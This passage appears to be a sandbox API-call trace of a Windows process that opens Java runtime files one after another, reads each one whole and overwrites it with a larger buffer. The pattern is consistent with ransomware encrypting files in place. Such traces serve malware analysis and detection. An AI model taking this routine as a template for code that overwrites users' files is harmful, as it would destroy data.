files (x86)\\java\\jre7\\lib\\jfxrt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0118.740] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.740] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xce642c [0118.740] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0118.740] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0118.740] ReleaseMutex (hMutex=0x168) returned 1 [0118.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxrt.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0118.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxrt.jar", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfxrt.jar", lpUsedDefaultChar=0x0) returned 9 [0118.740] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.745] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.769] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.788] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.799] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0118.804] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ef30000 [0118.814] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0119.357] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x311f23c, dwLength=0x1c | out: lpBuffer=0x311f23c*(BaseAddress=0x7ef80000, AllocationBase=0x7ef80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.357] VirtualAlloc (lpAddress=0x0, dwSize=0x70000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eec0000 [0119.366] VirtualFree (lpAddress=0x7ef30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.371] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0119.373] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0119.373] VirtualQuery (in: lpAddress=0x7ef30000, lpBuffer=0x311f23c, dwLength=0x1c | out: lpBuffer=0x311f23c*(BaseAddress=0x7ef30000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0119.374] VirtualAlloc (lpAddress=0x7ef30000, dwSize=0x20000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ef30000 [0119.374] VirtualAlloc (lpAddress=0x7ef30000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ef30000 [0119.378] ReadFile (in: hFile=0x208, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0119.379] SetFilePointer (in: hFile=0x208, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xce442c [0119.379] ReadFile (in: hFile=0x208, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0119.381] SetFilePointer (in: hFile=0x208, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xce442c [0119.385] VirtualAlloc (lpAddress=0x0, dwSize=0x90000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ee30000 [0119.745] VirtualQuery (in: lpAddress=0x7eec0000, lpBuffer=0x311f2b0, dwLength=0x1c | out: lpBuffer=0x311f2b0*(BaseAddress=0x7eec0000, AllocationBase=0x7eec0000, AllocationProtect=0x4, RegionSize=0x70000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.745] VirtualFree (lpAddress=0x7eec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.748] VirtualQuery (in: lpAddress=0x7ef30000, lpBuffer=0x311f2b0, dwLength=0x1c | out: lpBuffer=0x311f2b0*(BaseAddress=0x7ef30000, AllocationBase=0x7ef30000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0119.748] VirtualFree (lpAddress=0x7ef30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.749] WriteFile (in: hFile=0x208, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x311f28c*=0x2588, lpOverlapped=0x0) returned 1 [0124.207] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0124.207] WriteFile (in: hFile=0x208, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0124.207] WriteFile (in: hFile=0x208, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0124.207] WriteFile (in: hFile=0x208, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0124.208] WriteFile (in: hFile=0x208, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0124.208] WriteFile (in: hFile=0x208, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0124.208] WriteFile (in: hFile=0x208, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0124.209] WriteFile (in: hFile=0x208, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0124.209] WriteFile (in: hFile=0x208, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0124.209] WriteFile (in: hFile=0x208, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0124.209] VirtualFree (lpAddress=0x7ee30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0124.221] CloseHandle (hObject=0x208) returned 1 [0124.221] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management-agent.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.601] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.601] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x181 [0127.601] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.601] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.601] ReleaseMutex (hMutex=0x168) returned 1 [0127.601] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management-agent.jar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0127.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management-agent.jar", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="management-agent.jar", lpUsedDefaultChar=0x0) returned 20 [0127.602] ReadFile (in: hFile=0x204, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x181, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x311f2bc*=0x181, lpOverlapped=0x0) returned 1 [0127.617] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0127.617] WriteFile (in: hFile=0x204, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x709, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x311f2d0*=0x709, lpOverlapped=0x0) returned 1 [0127.617] CloseHandle (hObject=0x204) returned 1 [0127.618] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\blacklist" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\blacklist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.618] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.618] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xad2 [0127.619] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.619] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.619] ReleaseMutex (hMutex=0x168) returned 1 [0127.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="blacklist", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0127.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="blacklist", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="blacklist", lpUsedDefaultChar=0x0) returned 9 [0127.619] ReadFile (in: hFile=0x204, lpBuffer=0x2668268, nNumberOfBytesToRead=0xad2, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x311f2bc*=0xad2, lpOverlapped=0x0) returned 1 [0127.621] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0127.621] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x105a, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x311f2d0*=0x105a, lpOverlapped=0x0) returned 1 [0127.621] CloseHandle (hObject=0x204) returned 1 [0127.632] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\sound.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\sound.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.634] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.634] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4ba [0127.634] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.634] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.634] ReleaseMutex (hMutex=0x168) returned 1 [0127.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sound.properties", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0127.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sound.properties", cchWideChar=16, lpMultiByteStr=0x1f88ba4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sound.properties", lpUsedDefaultChar=0x0) returned 16 [0127.635] ReadFile (in: hFile=0x204, lpBuffer=0x2882dd8, nNumberOfBytesToRead=0x4ba, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesRead=0x311f2bc*=0x4ba, lpOverlapped=0x0) returned 1 [0127.637] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0127.637] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0xa42, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x311f2d0*=0xa42, lpOverlapped=0x0) returned 1 [0127.637] CloseHandle (hObject=0x204) returned 1 [0127.638] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bangui" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bangui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.640] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.640] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41 [0127.640] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.640] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.640] ReleaseMutex (hMutex=0x168) returned 1 [0127.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bangui", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0127.640] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bangui", cchWideChar=6, lpMultiByteStr=0x1f7acb4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bangui", lpUsedDefaultChar=0x0) returned 6 [0127.640] ReadFile (in: hFile=0x204, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x311f2bc*=0x41, lpOverlapped=0x0) returned 1 [0127.641] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0127.642] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0127.642] CloseHandle (hObject=0x204) returned 1 [0127.642] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ceuta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ceuta"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.643] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.643] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x458 [0127.643] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.643] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.643] ReleaseMutex (hMutex=0x168) returned 1 [0127.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ceuta", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ceuta", cchWideChar=5, lpMultiByteStr=0x1f7acb4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ceuta", lpUsedDefaultChar=0x0) returned 5 [0127.644] ReadFile (in: hFile=0x204, lpBuffer=0x269c668, nNumberOfBytesToRead=0x458, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x311f2bc*=0x458, lpOverlapped=0x0) returned 1 [0127.646] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0127.646] WriteFile (in: hFile=0x204, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x9e0, lpOverlapped=0x0) returned 1 [0127.646] CloseHandle (hObject=0x204) returned 1 [0127.646] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Gaborone" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\gaborone"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.648] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.648] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x59 [0127.648] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.648] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.648] ReleaseMutex (hMutex=0x168) returned 1 [0127.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gaborone", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0127.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Gaborone", cchWideChar=8, lpMultiByteStr=0x1f7358c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Gaborone", lpUsedDefaultChar=0x0) returned 8 [0127.648] ReadFile (in: hFile=0x204, lpBuffer=0x1fbb118, nNumberOfBytesToRead=0x59, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbb118*, lpNumberOfBytesRead=0x311f2bc*=0x59, lpOverlapped=0x0) returned 1 [0127.649] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0127.650] WriteFile (in: hFile=0x204, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e1, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x5e1, lpOverlapped=0x0) returned 1 [0127.650] CloseHandle (hObject=0x204) returned 1 [0127.650] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Lagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\lagos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.651] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.651] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41 [0127.651] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0127.651] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.651] ReleaseMutex (hMutex=0x168) returned 1 [0127.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lagos", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lagos", cchWideChar=5, lpMultiByteStr=0x1f7acb4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lagos", lpUsedDefaultChar=0x0) returned 5 [0127.652] ReadFile (in: hFile=0x204, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x311f2bc*=0x41, lpOverlapped=0x0) returned 1 [0128.361] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0128.362] WriteFile (in: hFile=0x204, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0128.367] CloseHandle (hObject=0x204) returned 1 [0128.379] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Maseru" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\maseru"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0128.382] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, 